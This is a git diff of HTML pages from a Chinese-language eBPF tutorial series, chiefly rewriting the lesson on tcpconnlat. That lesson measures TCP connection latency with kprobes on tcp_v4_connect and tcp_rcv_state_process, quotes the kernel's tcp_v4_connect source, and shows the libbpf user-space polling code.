diff --git a/0-introduce/index.html b/0-introduce/index.html index 8cfa96d..22b9936 100644 --- a/0-introduce/index.html +++ b/0-introduce/index.html @@ -83,7 +83,7 @@ diff --git a/1-helloworld/index.html b/1-helloworld/index.html index 4c4e124..0290add 100644 --- a/1-helloworld/index.html +++ b/1-helloworld/index.html @@ -83,7 +83,7 @@ diff --git a/10-hardirqs/index.html b/10-hardirqs/index.html index 51ea540..fa60724 100644 --- a/10-hardirqs/index.html +++ b/10-hardirqs/index.html @@ -83,7 +83,7 @@ diff --git a/11-bootstrap/index.html b/11-bootstrap/index.html index a2c1f74..7fc14e9 100644 --- a/11-bootstrap/index.html +++ b/11-bootstrap/index.html @@ -83,7 +83,7 @@ diff --git a/13-tcpconnlat/index.html b/13-tcpconnlat/index.html index 8101e68..c973a72 100644 --- a/13-tcpconnlat/index.html +++ b/13-tcpconnlat/index.html @@ -83,7 +83,7 @@ @@ -144,38 +144,37 @@
-

eBPF入门实践教程:使用 libbpf-bootstrap 开发程序统计 TCP 连接延时

+

eBPF入门开发实践教程十三:统计 TCP 连接延时,并使用 libbpf 在用户态处理数据

+

eBPF (Extended Berkeley Packet Filter) 是一项强大的网络和性能分析工具,被应用在 Linux 内核上。eBPF 允许开发者动态加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。

+

本文是 eBPF 入门开发实践教程的第十三篇,主要介绍如何使用 eBPF 统计 TCP 连接延时,并使用 libbpf 在用户态处理数据。

背景

-

在互联网后端日常开发接口的时候中,不管你使用的是C、Java、PHP还是Golang,都避免不了需要调用mysql、redis等组件来获取数据,可能还需要执行一些rpc远程调用,或者再调用一些其它restful api。 在这些调用的底层,基本都是在使用TCP协议进行传输。这是因为在传输层协议中,TCP协议具备可靠的连接,错误重传,拥塞控制等优点,所以目前应用比UDP更广泛一些。但相对而言,tcp 连接也有一些缺点,例如建立连接的延时较长等。因此也会出现像 QUIC ,即 快速UDP网络连接 ( Quick UDP Internet Connections )这样的替代方案。

-

tcp 连接延时分析对于网络性能分析优化或者故障排查都能起到不少作用。

-

tcpconnlat 的实现原理

-

tcpconnlat 这个工具跟踪执行活动TCP连接的内核函数(例如,通过connect()系统调用),并显示本地测量的连接的延迟(时间),即从发送 SYN 到响应包的时间。

-

tcp 连接原理

-

tcp 连接的整个过程如图所示:

-

tcpconnlate

-

在这个连接过程中,我们来简单分析一下每一步的耗时:

+

在进行后端开发时,不论使用何种编程语言,我们都常常需要调用 MySQL、Redis 等数据库,或执行一些 RPC 远程调用,或者调用其他的 RESTful API。这些调用的底层,通常都是基于 TCP 协议进行的。原因是 TCP 协议具有可靠连接、错误重传、拥塞控制等优点,因此在网络传输层协议中,TCP 的应用广泛程度超过了 UDP。然而,TCP 也有一些缺点,如建立连接的延时较长。因此,也出现了一些替代方案,例如 QUIC(Quick UDP Internet Connections,快速 UDP 网络连接)。

+

分析 TCP 连接延时对网络性能分析、优化以及故障排查都非常有用。

+

tcpconnlat 工具概述

+

tcpconnlat 这个工具能够跟踪内核中执行主动 TCP 连接的函数（例如通过 connect() 系统调用发起的连接），测量并显示连接延时，即从发送 SYN 到收到响应包的时间。

+

TCP 连接原理

+

TCP 连接的建立过程,常被称为“三次握手”(Three-way Handshake)。以下是整个过程的步骤:

    -
  1. 客户端发出SYNC包:客户端一般是通过connect系统调用来发出 SYN 的,这里牵涉到本机的系统调用和软中断的 CPU 耗时开销
  2. -
  3. SYN传到服务器:SYN从客户端网卡被发出,这是一次长途远距离的网络传输
  4. -
  5. 服务器处理SYN包:内核通过软中断来收包,然后放到半连接队列中,然后再发出SYN/ACK响应。主要是 CPU 耗时开销
  6. -
  7. SYC/ACK传到客户端:长途网络跋涉
  8. -
  9. 客户端处理 SYN/ACK:客户端内核收包并处理SYN后,经过几us的CPU处理,接着发出 ACK。同样是软中断处理开销
  10. -
  11. ACK传到服务器:长途网络跋涉
  12. -
  13. 服务端收到ACK:服务器端内核收到并处理ACK,然后把对应的连接从半连接队列中取出来,然后放到全连接队列中。一次软中断CPU开销
  14. -
  15. 服务器端用户进程唤醒:正在被accpet系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。一次上下文切换的CPU开销
  16. +
  17. 客户端向服务器发送 SYN 包:客户端通过 connect() 系统调用发出 SYN。这涉及到本地的系统调用以及软中断的 CPU 时间开销。
  18. +
  19. SYN 包传送到服务器:这是一次网络传输,涉及到的时间取决于网络延迟。
  20. +
  21. 服务器处理 SYN 包:服务器内核通过软中断接收包,然后将其放入半连接队列,并发送 SYN/ACK 响应。这主要涉及 CPU 时间开销。
  22. +
  23. SYN/ACK 包传送到客户端:这是另一次网络传输。
  24. +
  25. 客户端处理 SYN/ACK:客户端内核接收并处理 SYN/ACK 包,然后发送 ACK。这主要涉及软中断处理开销。
  26. +
  27. ACK 包传送到服务器:这是第三次网络传输。
  28. +
  29. 服务器接收 ACK:服务器内核接收并处理 ACK,然后将对应的连接从半连接队列移动到全连接队列。这涉及到一次软中断的 CPU 开销。
  30. +
  31. 唤醒服务器端用户进程:被 accept() 系统调用阻塞的用户进程被唤醒,然后从全连接队列中取出来已经建立好的连接。这涉及一次上下文切换的CPU开销。

在客户端视角，正常情况下一次 TCP 连接的总耗时大约就是一次网络 RTT 的耗时。但在某些情况下，可能会出现连接时的网络传输耗时上涨、CPU 处理开销增加、甚至连接失败的情况。这种时候，在发现延时过长之后，就可以结合其他信息进行分析。
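举一个假设的例子：若客户端与服务器之间的单向网络延迟约为 25 ms，而两端内核处理 SYN、SYN/ACK 的软中断开销只有几微秒到几十微秒，那么从客户端发出 SYN 到收到 SYN/ACK 大约需要 50 ms，基本等于一次 RTT；tcpconnlat 统计的正是这段时间。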

-

ebpf 实现原理

-

在 TCP 三次握手的时候,Linux 内核会维护两个队列,分别是:

+

tcpconnlat 的 eBPF 实现

+

为了理解 TCP 的连接建立过程,我们需要理解 Linux 内核在处理 TCP 连接时所使用的两个队列:

-

服务端收到客户端发起的 SYN 请求后,内核会把该连接存储到半连接队列,并向客户端响应 SYN+ACK,接着客户端会返回 ACK,服务端收到第三次握手的 ACK 后,内核会把连接从半连接队列移除,然后创建新的完全的连接,并将其添加到 accept 队列,等待进程调用 accept 函数时把连接取出来。
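为了直观地看到这两个队列在用户态编程中的位置，下面给出一个最小的 TCP 服务端示意代码（端口 8080 与 backlog 128 均为假设值）：listen() 的 backlog 参数限制全连接队列的长度，accept() 则从全连接队列中取出已完成三次握手的连接。

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    int lfd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(8080);            /* 示例端口，仅作示意 */
    bind(lfd, (struct sockaddr *)&addr, sizeof(addr));

    /* backlog 决定全连接队列的上限（同时受 net.core.somaxconn 限制） */
    listen(lfd, 128);

    for (;;) {
        /* accept 从全连接队列中取出一个已建立的连接 */
        int cfd = accept(lfd, NULL, NULL);
        if (cfd >= 0)
            close(cfd);
    }
    return 0;
}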

-

我们的 ebpf 代码实现在 https://github.com/yunwei37/Eunomia/blob/master/bpftools/tcpconnlat/tcpconnlat.bpf.c 中:

-

它主要使用了 trace_tcp_rcv_state_process 和 kprobe/tcp_v4_connect 这样的跟踪点:

-

-SEC("kprobe/tcp_v4_connect")
+

理解了这两个队列的用途，我们就可以开始探究 tcpconnlat 的具体实现。tcpconnlat 的实现可以分为内核态和用户态两个部分，其中包括了几个主要的跟踪点：tcp_v4_connect、tcp_v6_connect 和 tcp_rcv_state_process。

+

这些跟踪点主要位于内核中的 TCP/IP 网络栈。当执行相关的系统调用或内核函数时,这些跟踪点会被激活,从而触发 eBPF 程序的执行。这使我们能够捕获和测量 TCP 连接建立的整个过程。

+

让我们先来看一下这些挂载点的源代码:

+
SEC("kprobe/tcp_v4_connect")
 int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
 {
  return trace_connect(sk);
@@ -193,76 +192,456 @@ int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
  return handle_tcp_rcv_state_process(ctx, sk);
 }
 
-

在 trace_connect 中,我们跟踪新的 tcp 连接,记录到达时间,并且把它加入 map 中:

-
struct {
- __uint(type, BPF_MAP_TYPE_HASH);
- __uint(max_entries, 4096);
- __type(key, struct sock *);
- __type(value, struct piddata);
+

这段代码展示了三个内核探针(kprobe)的定义。tcp_v4_connect 和 tcp_v6_connect 在对应的 IPv4 和 IPv6 连接被初始化时被触发，调用 trace_connect() 函数，而 tcp_rcv_state_process 在内核处理 TCP 连接状态变化时被触发，调用 handle_tcp_rcv_state_process() 函数。

+

接下来的部分将分为两大块:一部分是对这些挂载点内核态部分的分析,我们将解读内核源代码来详细说明这些函数如何工作;另一部分是用户态的分析,将关注 eBPF 程序如何收集这些挂载点的数据,以及如何与用户态程序进行交互。

+

tcp_v4_connect 函数解析

+

tcp_v4_connect函数是 Linux 内核中发起 IPv4 TCP 连接的主要函数。当用户态程序通过socket系统调用创建了一个套接字后，接着通过connect系统调用尝试连接到远程服务器，此时就会触发tcp_v4_connect函数。
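例如，下面这个最小的用户态示意程序（目标地址 127.0.0.1:8080 仅为假设值）在调用 connect() 时，内核就会进入 tcp_v4_connect：

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in dst = {0};

    dst.sin_family = AF_INET;
    dst.sin_port = htons(8080);
    inet_pton(AF_INET, "127.0.0.1", &dst.sin_addr);

    /* connect() 在内核中最终会走到 tcp_v4_connect，发出 SYN */
    if (connect(fd, (struct sockaddr *)&dst, sizeof(dst)) < 0)
        perror("connect");

    close(fd);
    return 0;
}

下面是内核中 tcp_v4_connect 的完整实现：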

+
/* This will initiate an outgoing connection. */
+int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+{
+  struct sockaddr_in *usin = (struct sockaddr_in *)uaddr;
+  struct inet_timewait_death_row *tcp_death_row;
+  struct inet_sock *inet = inet_sk(sk);
+  struct tcp_sock *tp = tcp_sk(sk);
+  struct ip_options_rcu *inet_opt;
+  struct net *net = sock_net(sk);
+  __be16 orig_sport, orig_dport;
+  __be32 daddr, nexthop;
+  struct flowi4 *fl4;
+  struct rtable *rt;
+  int err;
+
+  if (addr_len < sizeof(struct sockaddr_in))
+    return -EINVAL;
+
+  if (usin->sin_family != AF_INET)
+    return -EAFNOSUPPORT;
+
+  nexthop = daddr = usin->sin_addr.s_addr;
+  inet_opt = rcu_dereference_protected(inet->inet_opt,
+               lockdep_sock_is_held(sk));
+  if (inet_opt && inet_opt->opt.srr) {
+    if (!daddr)
+      return -EINVAL;
+    nexthop = inet_opt->opt.faddr;
+  }
+
+  orig_sport = inet->inet_sport;
+  orig_dport = usin->sin_port;
+  fl4 = &inet->cork.fl.u.ip4;
+  rt = ip_route_connect(fl4, nexthop, inet->inet_saddr,
+            sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport,
+            orig_dport, sk);
+  if (IS_ERR(rt)) {
+    err = PTR_ERR(rt);
+    if (err == -ENETUNREACH)
+      IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES);
+    return err;
+  }
+
+  if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) {
+    ip_rt_put(rt);
+    return -ENETUNREACH;
+  }
+
+  if (!inet_opt || !inet_opt->opt.srr)
+    daddr = fl4->daddr;
+
+  tcp_death_row = &sock_net(sk)->ipv4.tcp_death_row;
+
+  if (!inet->inet_saddr) {
+    err = inet_bhash2_update_saddr(sk,  &fl4->saddr, AF_INET);
+    if (err) {
+      ip_rt_put(rt);
+      return err;
+    }
+  } else {
+    sk_rcv_saddr_set(sk, inet->inet_saddr);
+  }
+
+  if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) {
+    /* Reset inherited state */
+    tp->rx_opt.ts_recent    = 0;
+    tp->rx_opt.ts_recent_stamp = 0;
+    if (likely(!tp->repair))
+      WRITE_ONCE(tp->write_seq, 0);
+  }
+
+  inet->inet_dport = usin->sin_port;
+  sk_daddr_set(sk, daddr);
+
+  inet_csk(sk)->icsk_ext_hdr_len = 0;
+  if (inet_opt)
+    inet_csk(sk)->icsk_ext_hdr_len = inet_opt->opt.optlen;
+
+  tp->rx_opt.mss_clamp = TCP_MSS_DEFAULT;
+
+  /* Socket identity is still unknown (sport may be zero).
+   * However we set state to SYN-SENT and not releasing socket
+   * lock select source port, enter ourselves into the hash tables and
+   * complete initialization after this.
+   */
+  tcp_set_state(sk, TCP_SYN_SENT);
+  err = inet_hash_connect(tcp_death_row, sk);
+  if (err)
+    goto failure;
+
+  sk_set_txhash(sk);
+
+  rt = ip_route_newports(fl4, rt, orig_sport, orig_dport,
+             inet->inet_sport, inet->inet_dport, sk);
+  if (IS_ERR(rt)) {
+    err = PTR_ERR(rt);
+    rt = NULL;
+    goto failure;
+  }
+  /* OK, now commit destination to socket.  */
+  sk->sk_gso_type = SKB_GSO_TCPV4;
+  sk_setup_caps(sk, &rt->dst);
+  rt = NULL;
+
+  if (likely(!tp->repair)) {
+    if (!tp->write_seq)
+      WRITE_ONCE(tp->write_seq,
+           secure_tcp_seq(inet->inet_saddr,
+              inet->inet_daddr,
+              inet->inet_sport,
+              usin->sin_port));
+    tp->tsoffset = secure_tcp_ts_off(net, inet->inet_saddr,
+             inet->inet_daddr);
+  }
+
+  inet->inet_id = get_random_u16();
+
+  if (tcp_fastopen_defer_connect(sk, &err))
+    return err;
+  if (err)
+    goto failure;
+
+  err = tcp_connect(sk);
+
+  if (err)
+    goto failure;
+
+  return 0;
+
+failure:
+  /*
+   * This unhashes the socket and releases the local port,
+   * if necessary.
+   */
+  tcp_set_state(sk, TCP_CLOSE);
+  inet_bhash2_reset_saddr(sk);
+  ip_rt_put(rt);
+  sk->sk_route_caps = 0;
+  inet->inet_dport = 0;
+  return err;
+}
+EXPORT_SYMBOL(tcp_v4_connect);
+
+

参考链接:https://elixir.bootlin.com/linux/latest/source/net/ipv4/tcp_ipv4.c#L340

+

接下来,我们一步步分析这个函数:

+

首先,这个函数接收三个参数:一个套接字指针sk,一个指向套接字地址结构的指针uaddr和地址的长度addr_len

+
int tcp_v4_connect(struct sock *sk, struct sockaddr *uaddr, int addr_len)
+
+

函数一开始就进行了参数检查,确认地址长度正确,而且地址的协议族必须是IPv4。不满足这些条件会导致函数返回错误。
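对应的检查代码如下（摘自上文的 tcp_v4_connect）：

if (addr_len < sizeof(struct sockaddr_in))
  return -EINVAL;

if (usin->sin_family != AF_INET)
  return -EAFNOSUPPORT;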

+

接下来,函数获取目标地址,如果设置了源路由选项(这是一个高级的IP特性,通常不会被使用),那么它还会获取源路由的下一跳地址。

+
nexthop = daddr = usin->sin_addr.s_addr;
+inet_opt = rcu_dereference_protected(inet->inet_opt,
+             lockdep_sock_is_held(sk));
+if (inet_opt && inet_opt->opt.srr) {
+  if (!daddr)
+    return -EINVAL;
+  nexthop = inet_opt->opt.faddr;
+}
+
+

然后,使用这些信息来寻找一个路由到目标地址的路由项。如果不能找到路由项或者路由项指向一个多播或广播地址,函数返回错误。
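对应的路由查找代码如下：

rt = ip_route_connect(fl4, nexthop, inet->inet_saddr,
          sk->sk_bound_dev_if, IPPROTO_TCP, orig_sport,
          orig_dport, sk);
if (IS_ERR(rt)) {
  err = PTR_ERR(rt);
  if (err == -ENETUNREACH)
    IP_INC_STATS(net, IPSTATS_MIB_OUTNOROUTES);
  return err;
}

if (rt->rt_flags & (RTCF_MULTICAST | RTCF_BROADCAST)) {
  ip_rt_put(rt);
  return -ENETUNREACH;
}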

+

接下来,它更新了源地址,处理了一些TCP时间戳选项的状态,并设置了目标端口和地址。之后,它更新了一些其他的套接字和TCP选项,并设置了连接状态为SYN-SENT
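对应的代码片段如下：

if (tp->rx_opt.ts_recent_stamp && inet->inet_daddr != daddr) {
  /* Reset inherited state */
  tp->rx_opt.ts_recent    = 0;
  tp->rx_opt.ts_recent_stamp = 0;
  if (likely(!tp->repair))
    WRITE_ONCE(tp->write_seq, 0);
}

inet->inet_dport = usin->sin_port;
sk_daddr_set(sk, daddr);

/* ……中间省略扩展头长度与 MSS 的设置…… */

tcp_set_state(sk, TCP_SYN_SENT);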

+

然后,这个函数使用inet_hash_connect函数尝试将套接字添加到已连接的套接字的散列表中。如果这步失败,它会恢复套接字的状态并返回错误。

+

如果前面的步骤都成功了,接着,使用新的源和目标端口来更新路由项。如果这步失败,它会清理资源并返回错误。
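这一步对应的代码是：

rt = ip_route_newports(fl4, rt, orig_sport, orig_dport,
           inet->inet_sport, inet->inet_dport, sk);
if (IS_ERR(rt)) {
  err = PTR_ERR(rt);
  rt = NULL;
  goto failure;
}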

+

接下来，它将目标信息提交到套接字，并为初始序列号（write_seq）和 TCP 时间戳偏移选择安全的随机值，同时为 IP 标识字段生成一个随机值。

+

然后,函数尝试使用TCP Fast Open(TFO)进行连接,如果不能使用TFO或者TFO尝试失败,它会使用普通的TCP三次握手进行连接。
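对应的代码片段为：

if (tcp_fastopen_defer_connect(sk, &err))
  return err;
if (err)
  goto failure;

err = tcp_connect(sk);

if (err)
  goto failure;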

+

最后,如果上面的步骤都成功了,函数返回成功,否则,它会清理所有资源并返回错误。

+

总的来说,tcp_v4_connect函数是一个处理TCP连接请求的复杂函数,它处理了很多情况,包括参数检查、路由查找、源地址选择、源路由、TCP选项处理、TCP Fast Open,等等。它的主要目标是尽可能安全和有效地建立TCP连接。

+

内核态代码

+
// SPDX-License-Identifier: GPL-2.0
+// Copyright (c) 2020 Wenbo Zhang
+#include <vmlinux.h>
+#include <bpf/bpf_helpers.h>
+#include <bpf/bpf_core_read.h>
+#include <bpf/bpf_tracing.h>
+#include "tcpconnlat.h"
+
+#define AF_INET    2
+#define AF_INET6   10
+
+const volatile __u64 targ_min_us = 0;
+const volatile pid_t targ_tgid = 0;
+
+struct piddata {
+  char comm[TASK_COMM_LEN];
+  u64 ts;
+  u32 tgid;
+};
+
+struct {
+  __uint(type, BPF_MAP_TYPE_HASH);
+  __uint(max_entries, 4096);
+  __type(key, struct sock *);
+  __type(value, struct piddata);
 } start SEC(".maps");
 
+struct {
+  __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+  __uint(key_size, sizeof(u32));
+  __uint(value_size, sizeof(u32));
+} events SEC(".maps");
+
 static int trace_connect(struct sock *sk)
 {
- u32 tgid = bpf_get_current_pid_tgid() >> 32;
- struct piddata piddata = {};
+  u32 tgid = bpf_get_current_pid_tgid() >> 32;
+  struct piddata piddata = {};
 
- if (targ_tgid && targ_tgid != tgid)
+  if (targ_tgid && targ_tgid != tgid)
+    return 0;
+
+  bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
+  piddata.ts = bpf_ktime_get_ns();
+  piddata.tgid = tgid;
+  bpf_map_update_elem(&start, &sk, &piddata, 0);
   return 0;
-
- bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
- piddata.ts = bpf_ktime_get_ns();
- piddata.tgid = tgid;
- bpf_map_update_elem(&start, &sk, &piddata, 0);
- return 0;
 }
-
-

在 handle_tcp_rcv_state_process 中，我们跟踪接收到的 tcp 数据包，从 map 中提取出对应的 connect 事件，并且计算延迟：

-
static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
+
+static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
 {
- struct piddata *piddatap;
- struct event event = {};
- s64 delta;
- u64 ts;
+  struct piddata *piddatap;
+  struct event event = {};
+  s64 delta;
+  u64 ts;
 
- if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
-  return 0;
+  if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
+    return 0;
 
- piddatap = bpf_map_lookup_elem(&start, &sk);
- if (!piddatap)
-  return 0;
+  piddatap = bpf_map_lookup_elem(&start, &sk);
+  if (!piddatap)
+    return 0;
 
- ts = bpf_ktime_get_ns();
- delta = (s64)(ts - piddatap->ts);
- if (delta < 0)
-  goto cleanup;
+  ts = bpf_ktime_get_ns();
+  delta = (s64)(ts - piddatap->ts);
+  if (delta < 0)
+    goto cleanup;
 
- event.delta_us = delta / 1000U;
- if (targ_min_us && event.delta_us < targ_min_us)
-  goto cleanup;
- __builtin_memcpy(&event.comm, piddatap->comm,
-   sizeof(event.comm));
- event.ts_us = ts / 1000;
- event.tgid = piddatap->tgid;
- event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
- event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
- event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
- if (event.af == AF_INET) {
-  event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
-  event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
- } else {
-  BPF_CORE_READ_INTO(&event.saddr_v6, sk,
-    __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
-  BPF_CORE_READ_INTO(&event.daddr_v6, sk,
-    __sk_common.skc_v6_daddr.in6_u.u6_addr32);
- }
- bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
-   &event, sizeof(event));
+  event.delta_us = delta / 1000U;
+  if (targ_min_us && event.delta_us < targ_min_us)
+    goto cleanup;
+  __builtin_memcpy(&event.comm, piddatap->comm,
+      sizeof(event.comm));
+  event.ts_us = ts / 1000;
+  event.tgid = piddatap->tgid;
+  event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
+  event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
+  event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
+  if (event.af == AF_INET) {
+    event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
+    event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
+  } else {
+    BPF_CORE_READ_INTO(&event.saddr_v6, sk,
+        __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
+    BPF_CORE_READ_INTO(&event.daddr_v6, sk,
+        __sk_common.skc_v6_daddr.in6_u.u6_addr32);
+  }
+  bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
+      &event, sizeof(event));
 
 cleanup:
- bpf_map_delete_elem(&start, &sk);
- return 0;
+  bpf_map_delete_elem(&start, &sk);
+  return 0;
+}
+
+SEC("kprobe/tcp_v4_connect")
+int BPF_KPROBE(tcp_v4_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("kprobe/tcp_v6_connect")
+int BPF_KPROBE(tcp_v6_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("kprobe/tcp_rcv_state_process")
+int BPF_KPROBE(tcp_rcv_state_process, struct sock *sk)
+{
+  return handle_tcp_rcv_state_process(ctx, sk);
+}
+
+SEC("fentry/tcp_v4_connect")
+int BPF_PROG(fentry_tcp_v4_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("fentry/tcp_v6_connect")
+int BPF_PROG(fentry_tcp_v6_connect, struct sock *sk)
+{
+  return trace_connect(sk);
+}
+
+SEC("fentry/tcp_rcv_state_process")
+int BPF_PROG(fentry_tcp_rcv_state_process, struct sock *sk)
+{
+  return handle_tcp_rcv_state_process(ctx, sk);
+}
+
+char LICENSE[] SEC("license") = "GPL";
+
+

这个eBPF(Extended Berkeley Packet Filter)程序主要用来监控并收集TCP连接的建立时间,即从发起TCP连接请求(connect系统调用)到连接建立完成(SYN-ACK握手过程完成)的时间间隔。这对于监测网络延迟、服务性能分析等方面非常有用。

+

首先,定义了两个eBPF maps:starteventsstart是一个哈希表,用于存储发起连接请求的进程信息和时间戳,而events是一个PERF_EVENT_ARRAY类型的map,用于将事件数据传输到用户态。

+
struct {
+  __uint(type, BPF_MAP_TYPE_HASH);
+  __uint(max_entries, 4096);
+  __type(key, struct sock *);
+  __type(value, struct piddata);
+} start SEC(".maps");
+
+struct {
+  __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
+  __uint(key_size, sizeof(u32));
+  __uint(value_size, sizeof(u32));
+} events SEC(".maps");
+
+

tcp_v4_connecttcp_v6_connect的kprobe处理函数trace_connect中,会记录下发起连接请求的进程信息(进程名、进程ID和当前时间戳),并以socket结构作为key,存储到start这个map中。

+
static int trace_connect(struct sock *sk)
+{
+  u32 tgid = bpf_get_current_pid_tgid() >> 32;
+  struct piddata piddata = {};
+
+  if (targ_tgid && targ_tgid != tgid)
+    return 0;
+
+  bpf_get_current_comm(&piddata.comm, sizeof(piddata.comm));
+  piddata.ts = bpf_ktime_get_ns();
+  piddata.tgid = tgid;
+  bpf_map_update_elem(&start, &sk, &piddata, 0);
+  return 0;
 }
 
+

当TCP状态机处理到SYN-ACK包,即连接建立的时候,会触发tcp_rcv_state_process的kprobe处理函数handle_tcp_rcv_state_process。在这个函数中,首先检查socket的状态是否为SYN-SENT,如果是,会从start这个map中查找socket对应的进程信息。然后计算出从发起连接到现在的时间间隔,将该时间间隔,进程信息,以及TCP连接的详细信息(源端口,目标端口,源IP,目标IP等)作为event,通过bpf_perf_event_output函数发送到用户态。

+
static int handle_tcp_rcv_state_process(void *ctx, struct sock *sk)
+{
+  struct piddata *piddatap;
+  struct event event = {};
+  s64 delta;
+  u64 ts;
+
+  if (BPF_CORE_READ(sk, __sk_common.skc_state) != TCP_SYN_SENT)
+    return 0;
+
+  piddatap = bpf_map_lookup_elem(&start, &sk);
+  if (!piddatap)
+    return 0;
+
+  ts = bpf_ktime_get_ns();
+  delta = (s64)(ts - piddatap->ts);
+  if (delta < 0)
+    goto cleanup;
+
+  event.delta_us = delta / 1000U;
+  if (targ_min_us && event.delta_us < targ_min_us)
+    goto cleanup;
+  __builtin_memcpy(&event.comm, piddatap->comm,
+      sizeof(event.comm));
+  event.ts_us = ts / 1000;
+  event.tgid = piddatap->tgid;
+  event.lport = BPF_CORE_READ(sk, __sk_common.skc_num);
+  event.dport = BPF_CORE_READ(sk, __sk_common.skc_dport);
+  event.af = BPF_CORE_READ(sk, __sk_common.skc_family);
+  if (event.af == AF_INET) {
+    event.saddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_rcv_saddr);
+    event.daddr_v4 = BPF_CORE_READ(sk, __sk_common.skc_daddr);
+  } else {
+    BPF_CORE_READ_INTO(&event.saddr_v6, sk,
+        __sk_common.skc_v6_rcv_saddr.in6_u.u6_addr32);
+    BPF_CORE_READ_INTO(&event.daddr_v6, sk,
+        __sk_common.skc_v6_daddr.in6_u.u6_addr32);
+  }
+  bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU,
+      &event, sizeof(event));
+
+cleanup:
+  bpf_map_delete_elem(&start, &sk);
+  return 0;
+}
+
+

理解这个程序的关键在于理解Linux内核的网络栈处理流程,以及eBPF程序的运行模式。Linux内核网络栈对TCP连接建立的处理过程是,首先调用tcp_v4_connecttcp_v6_connect函数(根据IP版本不同)发起TCP连接,然后在收到SYN-ACK包时,通过tcp_rcv_state_process函数来处理。eBPF程序通过在这两个关键函数上设置kprobe,可以在关键时刻得到通知并执行相应的处理代码。

+

一些关键概念说明:

+
    +
  • kprobe:Kernel Probe,是Linux内核中用于动态追踪内核行为的机制。可以在内核函数的入口和退出处设置断点,当断点被触发时,会执行与kprobe关联的eBPF程序。
  • +
  • map:是eBPF程序中的一种数据结构,用于在内核态和用户态之间共享数据。
  • +
  • socket:在Linux网络编程中,socket是一个抽象概念,表示一个网络连接的端点。内核中的struct sock结构就是对socket的实现。
  • +
+

用户态数据处理

+

用户态数据处理是使用perf_buffer__poll来接收并处理从内核发送到用户态的eBPF事件。perf_buffer__poll是libbpf库提供的一个便捷函数,用于轮询perf event buffer并处理接收到的数据。
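在开始轮询之前，用户态程序需要先基于内核态定义的events map 创建 perf buffer，并注册事件回调。创建方式大致如下（示意片段，pb、obj 等变量名仅供参考，具体请以仓库中的 tcpconnlat.c 为准）：

pb = perf_buffer__new(bpf_map__fd(obj->maps.events), PERF_BUFFER_PAGES,
                      handle_event, handle_lost_events, NULL, NULL);
if (!pb) {
    err = -errno;
    fprintf(stderr, "failed to open perf buffer: %d\n", err);
    goto cleanup;
}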

+

首先,让我们详细看一下主轮询循环:

+
    /* main: poll */
+    while (!exiting) {
+        err = perf_buffer__poll(pb, PERF_POLL_TIMEOUT_MS);
+        if (err < 0 && err != -EINTR) {
+            fprintf(stderr, "error polling perf buffer: %s\n", strerror(-err));
+            goto cleanup;
+        }
+        /* reset err to return 0 if exiting */
+        err = 0;
+    }
+
+

这段代码使用一个while循环来反复轮询 perf event buffer。如果轮询出错（被信号中断产生的 EINTR 除外），会打印错误消息并跳转到清理逻辑。这个轮询过程会一直持续，直到收到一个退出标志exiting。

+

接下来,让我们来看看handle_event函数,这个函数将处理从内核发送到用户态的每一个eBPF事件:

+
void handle_event(void* ctx, int cpu, void* data, __u32 data_sz) {
+    const struct event* e = data;
+    char src[INET6_ADDRSTRLEN];
+    char dst[INET6_ADDRSTRLEN];
+    union {
+        struct in_addr x4;
+        struct in6_addr x6;
+    } s, d;
+    static __u64 start_ts;
+
+    if (env.timestamp) {
+        if (start_ts == 0)
+            start_ts = e->ts_us;
+        printf("%-9.3f ", (e->ts_us - start_ts) / 1000000.0);
+    }
+    if (e->af == AF_INET) {
+        s.x4.s_addr = e->saddr_v4;
+        d.x4.s_addr = e->daddr_v4;
+    } else if (e->af == AF_INET6) {
+        memcpy(&s.x6.s6_addr, e->saddr_v6, sizeof(s.x6.s6_addr));
+        memcpy(&d.x6.s6_addr, e->daddr_v6, sizeof(d.x6.s6_addr));
+    } else {
